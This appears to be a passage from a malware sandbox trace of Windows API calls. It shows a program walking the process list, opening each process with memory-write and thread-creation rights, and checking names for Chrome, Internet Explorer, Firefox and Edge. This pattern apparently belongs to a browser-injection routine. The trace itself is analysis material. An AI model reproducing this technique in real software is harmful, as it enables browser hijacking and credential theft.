	[0205.493] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0205.494] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x2c44
	[0205.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.495] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0205.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.495] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.496] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0205.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.496] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.496] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.497] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x2c48
	[0205.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.497] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.498] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.498] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.498] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.498] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0205.499] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x2c4c
	[0205.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.503] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.503] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.503] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.504] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.504] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0205.504] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x2c50
	[0205.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.505] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0205.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.505] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.505] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0205.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.506] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.506] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.506] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x2c54
	[0205.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.507] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.507] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.507] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.508] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.508] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0205.508] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x2c58
	[0205.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.509] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0205.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.509] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.509] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0205.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.510] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.510] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0205.510] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x2c5c
	[0205.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.511] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0205.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.511] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.511] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0205.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.512] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.512] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0205.512] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x2c60
	[0205.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.513] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0205.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.513] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.513] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0205.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.513] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.513] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0205.514] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x2c64
	[0205.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.514] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0205.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.515] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.515] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0205.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.515] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.516] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0205.516] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0205.516] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0205.517] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x2c68
	[0205.517] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.517] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0205.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.518] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.518] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0205.519] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.519] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.519] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0205.520] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x2c6c
	[0205.520] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.520] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0205.520] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.520] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.521] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.521] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0205.521] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.521] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.521] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0205.522] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x2c70
	[0205.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.522] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0205.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.522] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.523] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.523] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0205.523] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.523] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.523] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0205.524] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x2c74
	[0205.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.524] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0205.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.524] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.525] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0205.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.525] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.525] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0205.526] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x2c78
	[0205.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.526] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0205.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.527] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.527] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0205.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.528] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.528] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0205.529] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x2c7c
	[0205.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.529] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0205.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.529] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.529] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0205.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.529] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.530] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0205.530] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x2c80
	[0205.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.530] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0205.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.531] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.531] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0205.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.532] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.532] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0205.533] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x2c84
	[0205.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.533] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0205.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.533] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.534] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0205.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.534] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.535] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0205.535] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x2c88
	[0205.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.535] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0205.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.536] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.536] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0205.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.536] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.536] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0205.537] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x2c8c
	[0205.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.537] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0205.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.537] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.538] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0205.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.538] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.538] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0205.539] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x2c90
	[0205.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.539] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0205.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.539] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.540] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0205.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.540] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.540] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0205.541] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x2c94
	[0205.541] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.541] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0205.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.542] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.542] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0205.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.543] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.543] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0205.544] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x2c98
	[0205.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.544] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0205.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.545] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.545] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0205.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.546] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.546] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0205.549] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x2c9c
	[0205.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.550] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0205.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.550] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.551] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.551] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0205.551] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.551] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.552] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0205.553] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x2ca0
	[0205.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.553] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0205.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.553] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.554] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0205.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.554] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.554] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
